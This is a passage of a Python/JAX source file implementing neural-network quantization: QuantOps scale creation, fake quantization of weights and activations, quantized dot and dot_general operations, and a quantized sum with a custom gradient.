half_shift=False) # disable half_shift for fp quantization
else:
initial_bounds = bounds
# We set bounds = -1 to indicate no quantization.
# TODO(shivaniagrawal): Move away from the hack of setting bound as -1.
bounds = jnp.asarray(bounds, SCALE_DTYPE)
if not DISABLE_EPSILON_IN_SCALE_FUN_FOR_TESTING:
# to avoid log2(0)
bounds = jnp.abs(bounds) + jnp.finfo(SCALE_DTYPE).eps
scale = jnp.exp2(-jnp.floor(jnp.log2(bounds))) # Scale to unit binade.
# NOTE: stop_gradient is needed here to prevent gradient flow through
# scale when scale is not a constant, but computed as a function of
# activations or weights.
scale = lax.stop_gradient(scale)
return cls(
prec=fp_quant,
scale=scale,
symmetric=True,
bounds=initial_bounds,
half_shift=False) # disable half_shift for fp quantization
@classmethod
def create_symmetric(cls, *, bounds, prec,
half_shift):
"""Create QuantOps for symmetric activations clipped to [-bounds, bounds].
Args:
bounds: The upper (and absolute lower) bound to clip the inputs.
prec: Signed int precision for the QuantOps.
half_shift: Symmetric quantization with all available values enabled
Returns:
QuantOps for quantizing/dequantizing signed activations.
"""
initial_bounds = bounds
bounds = jnp.asarray(bounds, SCALE_DTYPE)
if not DISABLE_EPSILON_IN_SCALE_FUN_FOR_TESTING:
bounds += jnp.finfo(SCALE_DTYPE).eps # to avoid div by 0
scale = primitives.signed_int_bound(
prec=prec, half_shift=half_shift) / bounds
# NOTE: stop_gradient is needed here to prevent gradient flow through scale
# when scale is not a constant, but computed as a function of activations or
# weights.
scale = lax.stop_gradient(scale)
return cls(
prec=prec,
scale=scale,
symmetric=True,
bounds=initial_bounds,
half_shift=half_shift)
@classmethod
def create_positive(cls, *, bounds,
prec):
"""Create QuantOps for positive activations clipped to [0, bounds].
Args:
bounds: The upper bound to clip the activations.
prec: Unsigned int precision for the QuantOps.
Returns:
QuantOps for quantizing/dequantizing unsigned activations.
"""
initial_bounds = bounds
bounds = jnp.asarray(bounds, SCALE_DTYPE)
if not DISABLE_EPSILON_IN_SCALE_FUN_FOR_TESTING:
bounds += jnp.finfo(SCALE_DTYPE).eps # to avoid div by 0
scale = primitives.unsigned_int_bound(prec=prec) / bounds
# NOTE: stop_gradient is needed here to prevent gradient flow through scale
# when scale is not a constant, but computed as a function of activations.
scale = lax.stop_gradient(scale)
return cls(
prec=prec,
scale=scale,
symmetric=False,
bounds=initial_bounds,
half_shift=False) # disable half_shift for positive distribution
def assert_scale_shape_is(self, *, shape):
# TODO(shivaniagrawal): add option for float scale for fixed bound acts
# quantization.
assert self._scale.shape == shape, (
'scale shape is unexpected, should be %s but got %s' %
(shape, self._scale.shape))
def to_quantized(self, x, *,
dtype):
"""Quantizes the argument to the target format.
integer: "upscales", rounds or floors and clips.
floating-point: optionally upscales, then downcasts to target precision.
Args:
x: Argument to be quantized.
dtype: Type of returned quantized value of x. If quantized x is an input
to a matmul, we might be want to set it to jnp.int8. If quantized x is
weights stored in memory, same applies. In fake_quant style we might
prefer to set dtype=SCALE_DTYPE, since quantized x might get constant
folded with rescale op (`from_quantized`). Please take a look at the
comment on SCALE_DTYPE.
Returns:
Quantized value of x.
"""
if isinstance(self._prec, _FloatQuant):
if self._prec.is_scaled:
x = jnp.multiply(x, self._scale).astype(x.dtype)
fp_spec = self._prec.fp_spec
return fp_cast.downcast_sat_ftz(
x,
fp_spec.exp_min,
fp_spec.exp_max,
fp_spec.sig_bits,
)
else:
if self._symmetric:
quantize = primitives.round_and_clip_to_signed_int
else:
quantize = primitives.floor_and_clip_to_unsigned_int
scaled_x = jnp.multiply(x, self._scale)
return quantize(
scaled_x, prec=self._prec, dtype=dtype, half_shift=self._half_shift)
# Same as to_quantized but it just "downscales" using the same scale.
def from_quantized(self, x, *,
dtype):
"""'Rescales' the quantized value.
Args:
x: quantized.
dtype: return type for rescaled x
Returns:
Rescaled x cast to type dtype
"""
if (isinstance(self._prec, _FloatQuant) and not self._prec.is_scaled):
return x
rescaled_x = jnp.divide(x, self._scale)
return rescaled_x.astype(dtype)
# Helper fake quantization
def fake_quant(self,
x,
*,
quantized_type,
fake_dependency = None):
x_dtype = x.dtype
quantized_x = self.to_quantized(x, dtype=quantized_type)
if fake_dependency is not None:
quantized_x = lax.tie_in(fake_dependency, quantized_x)
return self.from_quantized(quantized_x, dtype=x_dtype)
# Assumes weights are unsigned int of precision prec.
@classmethod
def create_weights_ops(
cls,
w,
*,
weight_params,
):
"""Create a QuantOps that can quantize and dequantize a weight tensor.
Args:
w: The weights to quantize.
weight_params: WeightParams Parameters required for weight quantization.
Returns:
Quantized and rescaled inputs using fake quant approach.
"""
weight_bounds = primitives.max_abs_weights(w, axis=weight_params.axis)
prec = weight_params.prec
half_shift = weight_params.half_shift
if isinstance(prec, _FloatQuant):
ops = cls.create_symmetric_fp(bounds=weight_bounds, fp_quant=prec)
else:
ops = cls.create_symmetric(
bounds=weight_bounds, prec=prec, half_shift=half_shift)
if weight_params.expected_scale_shape is not None:
# NOTE: We set keepdim to True when computing weights scale, as a result
# the axes which are reduced are left in the result as dimensions with
# size one. User should correctly pass the shape with reduced dimensions
# set to 1.
ops.assert_scale_shape_is(shape=weight_params.expected_scale_shape)
return ops
# Assumes weights are unsigned int of precision prec.
@classmethod
def create_weights_fake_quant(
cls,
w,
*,
weight_params,
quantized_type = SCALE_DTYPE,
fake_dependency = None,
):
"""Quantize weights with fake quant approach.
Args:
w: The weights to quantize.
weight_params: WeightParams Parameters required for weight quantization.
quantized_type: type of intermediate quantized value of weights. Defaults
to SCALE_DTYPE.
fake_dependency: dynamic array that quantized weights will have a fake
dependency on. See lax.tie_in for more details. This is used in order to
prevent constant folding of rescale op with quantized weights. Defaults
to None, in this case quantized weights would not have a fake
dependency.
Returns:
Quantized and rescaled inputs using fake quant approach.
"""
if weight_params.prec is None:
return w
ops = cls.create_weights_ops(w, weight_params=weight_params)
return ops.fake_quant(
w, quantized_type=quantized_type, fake_dependency=fake_dependency)
# TODO(malmaud): rename 'input' to activation here and elsewhere in this file.
@classmethod
def create_input_ops(
cls, inputs, *, hparams,
get_bounds_params):
"""Create a QuantOps that can quantize and dequantize an activation tensor.
Args:
inputs: The inputs to quantize.
hparams: Input hyperparameter (ActHParams).
get_bounds_params: GetBoundsParams. Parameters for GetBounds.
Returns:
Quantized and rescaled inputs using fake quant approach.
"""
# TODO(shivaniagrawal): investigate why pytype allows types other than
# ActsBoundT.
if isinstance(hparams.bounds, int):
hparams.bounds = float(hparams.bounds)
# NOTE: if flax module name is None, default name is used.
# If we want to train with no quantization at first and then turn on
# GetBounds quantization, we still have to call GetBounds even before
# quantization is enabled since GetBounds calculates and stores the running
# statistics that we will use once quantization is enabled. But before
# quantization is enabled, we want to ignore the returned bounds and just
# return the original unquantized input. To do so, we take advantage of the
# fact that GetBounds returns a constant fixed bound for an initial time
# period and set that initial bound to a special value (-1) to indicate we
# want to store activation statistics without applying quantization. That
# will cause clip_bounds will be a tensor of all '-1', which we will check
# for in a lax.cond call below.
# TODO(malmaud): Refactor code to separate bounds calculation from tracking
# activation statistics to avoid the need to rely on special bounds values
# when disabling quantization.
if isinstance(hparams.bounds, get_bounds.GetBounds.Hyper):
if not get_bounds_params:
raise ValueError(
'act_hparams.bounds is of type GetBounds.Hyper, user must '
'provide get_bounds_params, parameters for GetBounds.')
clip_bounds = get_bounds.GetBounds(
hyper=hparams.bounds, name=get_bounds_params.module_name)(
inputs,
bounds_params=get_bounds_params,
)
elif isinstance(hparams.bounds, (float, jnp.ndarray)):
clip_bounds = hparams.bounds
else:
assert False, (
'%s is not a valid type for hparams.bounds, should be float, a list '
'of floats, or GetBounds.Hyper.' % (type(hparams.bounds)))
if isinstance(hparams.prec, _FloatQuant):
ops = cls.create_symmetric_fp(bounds=clip_bounds, fp_quant=hparams.prec)
elif hparams.input_distribution == cls.ActHParams.InputDistribution.symmetric:
ops = cls.create_symmetric(
bounds=clip_bounds, prec=hparams.prec, half_shift=hparams.half_shift)
elif hparams.input_distribution == cls.ActHParams.InputDistribution.positive:
ops = cls.create_positive(bounds=clip_bounds, prec=hparams.prec)
else:
assert False, "can't happen."
if get_bounds_params and get_bounds_params.expected_bounds_shape is not None:
if isinstance(hparams.bounds, get_bounds.GetBounds.Hyper):
ops.assert_scale_shape_is(shape=get_bounds_params.expected_bounds_shape)
else:
logging.info(
'Ignoring value of argument expected_scale_shape. Scale for fixed '
'bounds would be scalar.')
return ops
@classmethod
def create_inputs_fake_quant(
cls, inputs, *, hparams,
get_bounds_params):
"""Quantize input with fake quant approach.
Args:
inputs: The inputs to quantize.
hparams: Input hyperparameter (ActHParams).
get_bounds_params: GetBoundsParams. Parameters for GetBounds.
Returns:
Quantized and rescaled inputs using fake quant approach.
"""
if hparams.bounds is None or hparams.prec is None:
# TODO(lew): support bound-clipping without quantization
return inputs
ops = cls.create_input_ops(
inputs, hparams=hparams, get_bounds_params=get_bounds_params)
quantized_inputs = ops.fake_quant(inputs, quantized_type=SCALE_DTYPE)
return lax.cond(ops.should_quantize(), lambda _: quantized_inputs,
lambda _: inputs, None)
# When using GetBounds quantization (if hparams.bounds is an instance of
# GetBounds.Hyper), if we want to disable quantization but continue to
# collect activation statistics, we have GetBounds return a clip_bounds
# tensor of all '-1' values as a signal that quantization shouldn't be
# applied. See comment on the call to 'GetBounds' above.
# TODO(malmaud): Find a less hacky way to do this.
def should_quantize(self):
"""Return whether QuantOps should quantize."""
# We return a scalar jnp.ndarray of dtype bool instead of a Python bool
# because during the Jax JIT compilation, self._bounds will be a tracer
# instead of a concrete tensor, which can't be coerced to a Python bool.
# Since the type of jnp.all is an ndarray, we invert it with '~' instead of
# 'not'
return ~jnp.all(self._bounds == -1)
def get_scale_for_aqt(self, *, allow_per_channel_scales):
"""Returns the scale in a shape appropriate for AQT.
An error is raised if the granularity of the scale factors is incompatible
with the current AQT implementation and the setting of
'allow_per_channel_scales'.
Args:
allow_per_channel_scales: A boolean indicating whether a separate scale
factor is allowed for each output channel (True) or if only a scalar
(ie, per-layer) scale factor is allowed (False).
Returns:
Either a scalar array that corresponds to a per-layer scale factor, or an
array of shape (1, num_channels) that corresponds to per-channel scale
factors.
"""
scale = self._scale
# If 'scale' is a 1x1x...x1 matrix (ie, only has one element), we
# canonicalize it to a scalar to simplify the shape-handling code in the AQT
# implementation.
if scale.size == 1:
return scale.reshape(())
# If the caller requested a single per-layer scaling factor but the scale
# factor is non-scalar, raise an error.
if not allow_per_channel_scales:
raise ValueError('Scale is not per-layer since it has shape '
f'{scale.shape}.')
# If 'scale' is two-dimensional, then the only allowed shape for 'scale'
# that is currently compatible with AQT is [1, num_channels]. If instead it
# had a shape like [N, 1] or [N, num_channels], that would correspond to
# per-row scale factors, which our AQT implementation does not currently
# handle.
if scale.ndim == 2:
if scale.shape[0] != 1:
raise ValueError(
'Scale has per-row scaling factors, which is not '
f'currently compatible with AQT. Scale has shape {scale.shape}, but '
'a 1 is expected as the shape of the first dimension.')
return scale
else:
raise ValueError(
'Scale has more than two dimensions, which is not '
'currently compatible with AQT. AQT currently only handles multiplying '
f'2D arrays, but has shape {scale.shape}.')
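# Illustrative only (not part of the original module): fake-quantizing an
# activation tensor with a fixed symmetric clipping bound. The bound (6.0) and
# precision (8 bits) are made-up example values.
def _fake_quant_example(x):
  ops = QuantOps.create_symmetric(bounds=6.0, prec=8, half_shift=False)
  return ops.fake_quant(x, quantized_type=SCALE_DTYPE)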
PrecisionType = typing.Any
def quantized_dot(*,
w,
act,
quant_type,
weight_params,
act_hparams,
get_bounds_params,
prefer_int8_to_int32_dot,
dot_precision = None):
"""LAX dot with optionally quantized weights and activations.
Wraps LAX's `Dot
<https://github.com/google/jax/blob/f65a327c764406db45e95048dfe09209d8ef6d37/jax/_src/lax/lax.py#L632`_
operator.
Args:
w: an array representing weights
act: an array representing activations
quant_type: quantization strategy
weight_params: QuantOps.WeightParams instance for describing weights
quantization.
act_hparams: Optional activation quantization hyperparameters; instance of
QuantOps.ActHParams. None would mean no activation quantization.
get_bounds_params: Optional get bounds params for auto activation
quantization; instance of GetBounds.Params.
prefer_int8_to_int32_dot: Whether to feed lax.dot inputs with an int8
dtype and accumulate to int32 dtype if quantizing to 8 bits or 4 bits. If
False, inputs are always floating-point.
dot_precision: Optional. Either ``None``, which means the default precision
for the backend, or a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``).
Returns:
An array containing the result with the same dtype as 'w' and 'act'.
Raises:
RuntimeError: 'quant_type' had an unrecognized value.
TypeError: 'act' and 'w' has different input types.
ValueError: Shapes of 'act' and 'w' not compatible with quant_type.
"""
# This code was initially expanded from
# https://github.com/google/jax/blob/f65a327c764406db45e95048dfe09209d8ef6d37/jax/_src/lax/lax.py#L632
# We keep the original return-value semantics of lax.dot, which this wraps. In
# particular, the type of the return value of quantized_dot is the same as the
# type of the inputs. That means that if the inputs are bfloat16, then the
# return type of this function will also be bfloat16 even though on current
# TPUs the underlying bf16*bf16 matrix-multiplication accumulates results to
# float32. This is potentially undesirable since the user might want the raw
# float32 result, but it ultimately stems from a limitation of the HLO 'dot'
# instruction. If that instruction updates to support user-specified output
# types, we could update quantized_dot accordingly to take a dtype argument to
# control the return value type. This applies equally to
# quantized_dynamic_dot_general.
if not (1 <= act.ndim <= 2 and 1 <= w.ndim <= 2 and
act.shape[-1] == w.shape[0]):
raise ValueError('Incompatible shapes for dot: got {} and {}.'.format(
act.shape, w.shape))
dot_dimension_numbers = (((act.ndim - 1,), (0,)), ((), ()))
if quant_type == QuantType.aqt:
# Let 's' be activation scales and 't' be weight scales. We implement
# matmul(RoundAndClip(act*s), RoundAndClip(s^-1 * w * t)) *t^-1. In the
# comments below, we refer to this terminology.
# lax.dot accepts any combination of 1d and 2d arguments for its lhs and rhs
# input. To simplify the AQT implementation, we only accept 2d arguments for
# now.
if w.ndim != 2 or act.ndim != 2:
raise ValueError(
'AQT is currently only implemented for matrix*matrix operations')
num_input_channels = act.shape[1]
num_output_channels = w.shape[1]
# The ValueError raised in the guard at the beginning of this function
# should have already checked that the weight matrix has a number of rows
# equal to the number of channels in the activation.
assert w.shape[0] == num_input_channels
# We carry out all intermediate calculations using the same dtype as the
# inputs. We want to be careful to not take a model configured to be trained
# in bf16 and accidentally train it in fp32 by virtue of the scale dtype
# being fp32.
if act.dtype != w.dtype:
raise TypeError(
f'Activations and weight must have the same dtype, but got {act.dtype} and {w.dtype}'
)
input_dtype = act.dtype
is_act_quantized = False
# In this case, activations will be quantized at some point during training
# (either now or later) and so we need to gather activation statistics by
# calling 'QuantOps.create_input_ops', even if activations are not being
# quantized on this particular training step (see b/174516400).
if act_hparams is not None and act_hparams.prec is not None:
# Calculate 's', the per-column scale factor on activations.
act_op = QuantOps.create_input_ops(
act, hparams=act_hparams, get_bounds_params=get_bounds_params)
is_act_quantized = act_op.should_quantize()
# Quantize activation matrix by computing RoundAndClip(w*s)
# TODO(malmaud): We have to cast quantized activations to an fp format
# instead of int8 since int8 matmul with int32 accumulation is not yet
# supported in XLA (and therefore in Jax). See b/170293520. We keep
# 'act_quantized' in whatever its original fp format was, typically bf16
# or fp32, to follow what Fakequant does (see the type cast at the end of
# QuantOpts.fake_quant).
act_quantized = act_op.to_quantized(act, dtype=input_dtype)
# Now calculate s^-1. First we extract s, the activation scale factor,
# into a variable called 'act_scale'. We extract it from 'act_op', the
# QuantOps instance that calculated the scale factors for the activation
# matrix.
act_scale = act_op.get_scale_for_aqt(allow_per_channel_scales=True)
# act_scale should either be a scalar, corresponding to per-layer
# quantization, or a matrix with shape (1, num_input_channels),
# corresponding to per-activation-channel scale factors.
if act_scale.ndim != 0:
shape_utils.assert_shapes_equal(act_scale.shape,
(1, num_input_channels))
# 'w' has one row per column of 'act_scale'. To scale each row of 'w' by
# the inverse of the corresponding column in 'act_scale', we first have
# to reshape 'act_scale' from (1, num_input_channels) to
# (num_input_channels, 1) so the scale factors will broadcast
# appropriately across the columns of 'w'.
act_scale = act_scale.reshape(num_input_channels, 1)
# Now we calculate s^-1 * w.
w_scaled_rows = ((1 / act_scale) * w).astype(input_dtype)
# TODO(shivaniagrawal): This section repeats code from the 'else' block.
# The code is repeated twice because quantization can either be disabled
# dynamically by setting the clipping bound to -1 (see comments on
# 'should_quantize'), or statically by setting the 'prec' hyperparameter
# to None. This block deals with the dynamic case (hence necessitating the
# use of the dynamic 'lax.cond') while the 'else' block handles the static
# case. Ultimately, we should unify them.
act_quantized, w_scaled_rows = lax.cond(
is_act_quantized,
lambda _: (act_quantized, w_scaled_rows),
lambda _: (act, w), None)
else:
# In this case, activations are not being quantized; only weights. There
# is no need to absorb activation scales into the rows of the weight
# matrix so 'w_scaled_rows' can just be set to the original weight matrix.
act_quantized = act
w_scaled_rows = w
is_weight_quantized = False
if weight_params is not None and weight_params.prec is not None:
is_weight_quantized = True
# Calculate 'r' from (s^-1) * w
weight_op = QuantOps.create_weights_ops(
w_scaled_rows, weight_params=weight_params)
weight_scale = weight_op.get_scale_for_aqt(allow_per_channel_scales=True)
# Similar to 'act_scale' above, the weight_scale can either be a single
# scalar or be a matrix with shape (1, num_output_channels), corresponding
# to a per-channel scale factor for the weight matrix. We verify it here.
if weight_scale.ndim != 0:
shape_utils.assert_shapes_equal(weight_scale.shape,
(1, num_output_channels))
# Quantize weight matrix by calculating RoundAndClip(s^-1 * w * t)
# TODO(malmaud): See comment on 'act_op.to_quantized' above, which applies
# here as well.
weight_quantized = weight_op.to_quantized(
w_scaled_rows, dtype=input_dtype)
else:
weight_quantized = w_scaled_rows
weight_scale = jnp.array(1.0, dtype=SCALE_DTYPE)
# Use metadata context to annotate op metadata with quantization info
act_prec = None if act_hparams is None else act_hparams.prec
act_has_symm_distribution = act_hparams is not None and (
act_hparams.input_distribution
== QuantOps.ActHParams.InputDistribution.symmetric)
weight_prec = None if weight_params is None else weight_params.prec
# To decide whether to use an integer-domain dot operation, we first check
# if the static quantization parameters are compatible with it by seeing if
# they request that both inputs be quantized to 8 bits or less. Then check if
# the dynamic parameters are compatible with it. ie, in a training run with
# quantization enabled, are we past the activation start step yet.
# We also do not use int8_to_int32_dot if activation has positive
# distribution and prec=8, since we would not be able to fit uint8 range in
# int8.
# TODO(shivaniagrawal): A proper solution for this would be to have mixed
# dot(uint8, int8) -> int32 in XLA.
weight_fits_in_int8 = is_weight_quantized and (weight_prec is not None and
weight_prec <= 8)
# is_act_quantized might be an instance of a Jax tracer instead of a
# Python boolean since it is generally computed from a dynamic input to a
# JITted Jax function. Thus we use '&' instead of 'and'.
act_prec_fits_int8 = act_prec is not None and (
(act_prec == 8 and act_has_symm_distribution) or (act_prec < 8))
act_fits_in_int8 = is_act_quantized & act_prec_fits_int8
use_int8_to_int32_dot = prefer_int8_to_int32_dot & weight_fits_in_int8 & act_fits_in_int8
metadata_context = contextlib.suppress()
if flags.FLAGS.metadata_enabled:
metadata_context = compute_cost_utils.DotMetadataMonkeyPatch(
lhs_prec=act_prec, rhs_prec=weight_prec, rhs_is_weight=True)
with metadata_context:
# Calculate matmul(...)
out_quantized = dot_general_aqt(
act_quantized,
weight_quantized,
dimension_numbers=dot_dimension_numbers,
dot_precision=dot_precision,
use_int8_to_int32_dot=use_int8_to_int32_dot)
# Scale the columns of the matmul output by computing `matmul(...) * t^-1`
# TODO(malmaud): Make it possible to return an unquantized matmul to support
# disabling quantization during initial phase of training.
#
# We convert the return value back to input_dtype to ensure the output
# tensor of quantized_dot has the same dtype as the input tensors to
# quantized_dot. This explicit cast is necessary since if the inputs are
# bf16, 'weight_scale' will still be fp32 and so multiplying out_quantized by
# (1/weight_scale) will result in a fp32 tensor. We want to convert that
# back to bf16.
return (out_quantized * (1 / weight_scale)).astype(input_dtype)
elif quant_type in (QuantType.fake_quant, QuantType.fake_quant_with_int):
if quant_type == QuantType.fake_quant_with_int:
fake_dependency = act
# create a dependency on fake input to control constant folding
else:
fake_dependency = None
quantized_type = quant_type.to_jax_type()
w = QuantOps.create_weights_fake_quant(
w,
weight_params=weight_params,
quantized_type=quantized_type,
fake_dependency=fake_dependency)
# TODO(shivaniagrawal): HParams currently allows act_hparams to be NONE.
# Going forward we can change act_hparams to be required field where if
# either `prec` or `bounds` is None will result in No activation
# quantization.
if act_hparams:
act = QuantOps.create_inputs_fake_quant(
act, hparams=act_hparams, get_bounds_params=get_bounds_params)
metadata_context = contextlib.suppress()
# Use metadata context to annotate op metadata with quantization info
act_prec = None if act_hparams is None else act_hparams.prec
weight_prec = None if weight_params is None else weight_params.prec
if flags.FLAGS.metadata_enabled:
metadata_context = compute_cost_utils.DotMetadataMonkeyPatch(
lhs_prec=act_prec, rhs_prec=weight_prec, rhs_is_weight=True)
with metadata_context:
out_quantized = lax.dot_general(
act,
w,
dimension_numbers=dot_dimension_numbers,
precision=dot_precision)
return out_quantized
else:
raise RuntimeError(f'Unsupported quant_type {quant_type}')
class QuantizedDot(nn.Module):
"""Flax module that calculates a quantized 'dot' operation."""
quant_type: QuantType
weight_params: QuantOps.WeightParams
act_hparams: Optional[QuantOps.ActHParams]
prefer_int8_to_int32_dot: bool
dot_precision: Optional[PrecisionType] = None
# TODO(malmaud): Remove the 'padding_mask' field from 'GetBounds.Params'
# so that 'get_bounds_params' can be a hyperparameter of this class and
# only the padding mask will be passed as an argument to '__call__'.
@nn.compact
def __call__(
self, w, act,
get_bounds_params):
return quantized_dot(
w=w,
act=act,
get_bounds_params=get_bounds_params,
quant_type=self.quant_type,
weight_params=self.weight_params,
act_hparams=self.act_hparams,
dot_precision=self.dot_precision,
prefer_int8_to_int32_dot=self.prefer_int8_to_int32_dot)
def quantized_dynamic_dot_general(
*,
lhs_act,
rhs_act,
quant_type,
lhs_act_hparams,
lhs_get_bounds_params,
rhs_act_hparams,
rhs_get_bounds_params,
dot_dimension_numbers,
dot_precision = None):
"""LAX dot general with optionally quantized dynamic inputs.
Wraps LAX's `DotGeneral
<https://github.com/google/jax/blob/f65a327c764406db45e95048dfe09209d8ef6d37/jax/_src/lax/lax.py#L667>`_
operator.
Args:
lhs_act: an array representing the left-hand-side activations
rhs_act: an array representing the right-hand-side activations
quant_type: quantization strategy
lhs_act_hparams: Optional activation quantization hyperparameters for lhs act;
instance of QuantOps.ActHParams. None means no quantization.
lhs_get_bounds_params: Optional get bounds params for lhs act auto
quantization; instance of GetBounds.Params.
rhs_act_hparams: Optional activation quantization hyperparameters for rhs act;
instance of QuantOps.ActHParams. None means no quantization.
rhs_get_bounds_params: Optional get bounds params for rhs act auto
quantization; instance of GetBounds.Params.
dot_dimension_numbers: a tuple of tuples of the form
`((lhs_contracting_dims, rhs_contracting_dims), (lhs_batch_dims,
rhs_batch_dims))`.
dot_precision: Optional. Either ``None``, which means the default precision
for the backend, or a ``lax.Precision`` enum value (``Precision.DEFAULT``,
``Precision.HIGH`` or ``Precision.HIGHEST``).
Returns:
An array containing the result.
Raises:
RuntimeError: 'quant_type' had an unrecognized value.
TypeError: Dtypes of lhs_act and rhs_act differed.
"""
# See comment at the beginning of quantized_dot regarding its return type,
# which also applies to this function.
if quant_type == QuantType.aqt:
# Let 's1' be the scale of 'lhs_act' and 's2' be the scale of 'rhs_act'. We
# calculate dot_general(RoundAndClip(s1*lhs_act),
# RoundAndClip(s2*rhs_act))/(s1*s2). Note that unlike in
# quantized_dot_general, the scale factors must be scalar (ie, per-tensor
# quantization) since activations always have static scale factors and so
# there is no way to absorb per-column scale factor from lhs_act into the
# rows of rhs_act.
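# Ignoring rounding and clipping, dot_general(s1*lhs_act, s2*rhs_act) equals
# s1*s2 * dot_general(lhs_act, rhs_act) because s1 and s2 are scalars, so
# dividing the result by (s1*s2) below recovers the unquantized product and
# the only error comes from the RoundAndClip steps.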
# See comment on 'input_dtype' in 'quantized_dot'.
if lhs_act.dtype != rhs_act.dtype:
raise TypeError('Both activations must have the same dtype, but got '
f'{lhs_act.dtype} and {rhs_act.dtype}')
input_dtype = lhs_act.dtype
def get_tensor_and_scale_for_act(
act, hparams,
get_bounds_params
):
# We check whether activations should be quantized based on 'hparams'. If
# so, we quantize it. If not, we return it unchanged. In either case, we
# return a scale factor appropriate for unscaling the result of the
# lax.dot_general.
if hparams is not None and hparams.prec is not None:
quant_op = QuantOps.create_input_ops(
act, hparams=hparams, get_bounds_params=get_bounds_params)
scale = quant_op.get_scale_for_aqt(allow_per_channel_scales=False)
# Since only per-layer scale factors are supported, we assert that the
# scale factors are scalars.
shape_utils.assert_shapes_compatible(scale.shape, ())
# TODO(malmaud): See comment on 'act_op.to_quantized' earlier in this
# file, which applies here as well.
act_quantized = quant_op.to_quantized(act, dtype=input_dtype)
# TODO(shivaniagrawal): See comment in 'dot_general' above on why this
# logic is duplicated here and in the 'else' block below.
return lax.cond(
quant_op.should_quantize(), #
lambda _: (act_quantized, scale), #
lambda _: (act, jnp.array(1.0, dtype=SCALE_DTYPE)), #
None)
else:
# To avoid having a separate code path for every possibility of which of
# the two input tensors are quantized, we implement not quantizing an
# activation tensor by simply setting its corresponding scale factor to
# 1.0.
return act, jnp.array(1.0, dtype=SCALE_DTYPE)
lhs_quantized, lhs_scale = get_tensor_and_scale_for_act(
lhs_act, lhs_act_hparams, lhs_get_bounds_params)
rhs_quantized, rhs_scale = get_tensor_and_scale_for_act(
rhs_act, rhs_act_hparams, rhs_get_bounds_params)
metadata_context = contextlib.suppress()
# Use metadata context to annotate op metadata with quantization info
lhs_prec = None if lhs_act_hparams is None else lhs_act_hparams.prec
rhs_prec = None if rhs_act_hparams is None else rhs_act_hparams.prec
if flags.FLAGS.metadata_enabled:
metadata_context = compute_cost_utils.DotMetadataMonkeyPatch(
lhs_prec=lhs_prec, rhs_prec=rhs_prec, rhs_is_weight=False)
with metadata_context:
out_quantized = lax.dot_general(
lhs_quantized,
rhs_quantized,
dimension_numbers=dot_dimension_numbers,
precision=dot_precision)
# TODO(malmaud): There is an asymmetry here: when we scale the activations
# to quantize them, the scaling happens in QuantOps.to_quantized. But here,
# when we dequantize the matrix multiplication of the activations by
# dividing by the product of the scale factors, we don't use QuantOps. It
# would be cleaner to do both operations at the same level of abstraction.
out = (out_quantized / (lhs_scale * rhs_scale)).astype(input_dtype)
elif quant_type in (QuantType.fake_quant, QuantType.fake_quant_with_int):
# TODO(shivaniagrawal): HParams currently allows act_hparams to be NONE.
# Going forward we can change act_hparams to be required field where if
# either `prec` or `bounds` is None will result in No activation
# quantization.
if lhs_act_hparams:
lhs_act = QuantOps.create_inputs_fake_quant(
lhs_act,
hparams=lhs_act_hparams,
get_bounds_params=lhs_get_bounds_params)
if rhs_act_hparams:
rhs_act = QuantOps.create_inputs_fake_quant(
rhs_act,
hparams=rhs_act_hparams,
get_bounds_params=rhs_get_bounds_params)
metadata_context = contextlib.suppress()
# Use metadata context to annotate op metadata with quantization info
lhs_prec = None if lhs_act_hparams is None else lhs_act_hparams.prec
rhs_prec = None if rhs_act_hparams is None else rhs_act_hparams.prec
if flags.FLAGS.metadata_enabled:
metadata_context = compute_cost_utils.DotMetadataMonkeyPatch(
lhs_prec=lhs_prec, rhs_prec=rhs_prec, rhs_is_weight=False)
with metadata_context:
out = lax.dot_general(
lhs_act,
rhs_act,
dimension_numbers=dot_dimension_numbers,
precision=dot_precision)
else:
raise RuntimeError(f'Unknown quant_type {quant_type}')
return out
@functools.partial(jax.custom_jvp, nondiff_argnums=(1, 2, 3))
def quantized_sum(
x, #
axis,
keepdims,
prec):
"""Sums a tensor while quantizing intermediate accumulations.
This is almost a drop-in replacement for jnp.sum. It only differs in that it
takes a 'prec' parameter that controls the quantization of
intermediate accumulations during the reduction.
Arguments:
x: Input, a Jax array
axis: Which axes to reduce over (see jnp.sum docs)
keepdims: Whether to keep or drop axes that are reduced (see jnp.sum docs)
prec: Precision to quantize intermediates to. Currently this can only be an instance
of QuantOps.FloatQuant.FloatPrec, corresponding to an unscaled
floating-point format, or it can be None to indicate no quantization
should be applied.
Returns:
A Jax array with the quantized sum of 'x'.
"""
# Don't quantize. In this case, this function just wraps jnp.sum.
if prec is None:
return jnp.sum(x, axis=axis, keepdims=keepdims)
# We bypass QuantOps.create_input_ops and directly call
# QuantOps.create_symmetric_fp because the former creates an instance of
# GetBounds, which in turn creates state variables to store activation
# statistics. We do not want to compute statistics for each individual
# addition within the sum reduction.
fp_quant = QuantOps.FloatQuant(is_scaled=False, fp_spec=prec)
quant_ops = QuantOps.create_symmetric_fp(fp_quant=fp_quant, bounds=None)
if not isinstance(axis, Iterable):
axis = (axis,)
axis = utils.normalize_axes(axis, x.ndim)
dtype = x.dtype
zero = jnp.zeros((), dtype=dtype)
x_quantized_sum = lax.reduce(
x,
init_values=zero,
computation=lambda a, b: quant_ops.to_quantized(a + b, dtype=dtype),
dimensions=axis)
if keepdims:
x_quantized_sum = jnp.expand_dims(x_quantized_sum, axis)
return x_quantized_sum
@quantized_sum.defjvp
def _quantized_sum_jvp(axis, keepdims, prec, primals, tangents):
(x,), (x_dot,) = primals, tangents
y = quantized_sum(x, axis=axis, keepdims=keepdims, prec=prec)
# We calculate the JVP based on the JVP of the original jnp.sum function. That
# corresponds to using a straight-through-estimator for the quantization
# operators in 'quantized_sum'.
_, y_dot = jax.jvp(lambda x: jnp.sum(x, keepdims=keepdims, axis=axis), (x,),
(x_dot,))
return y, y_dot
@functools.partial(jax.custom_jvp, nondiff_argnums=(2, 3, 4))
def dot_general_aqt(lhs, rhs, dimension_numbers, dot_precision,
use_int8_to_int32_dot):
"""Wrapper around lax.dot_general, but with option to use integer dot.
This function comes equipped with a custom gradient that defines the
gradient of this function to be the same as the equivalent call to
lax.dot_general, ignoring casts to and from integer types so that
quantization-aware-training will work correctly.
See docstring of lax.dot_general.
Args:
lhs: same as in lax.dot_general
rhs: same as in lax.dot_general
dimension_numbers: same as in lax.dot_general
dot_precision: same as in lax.dot_general
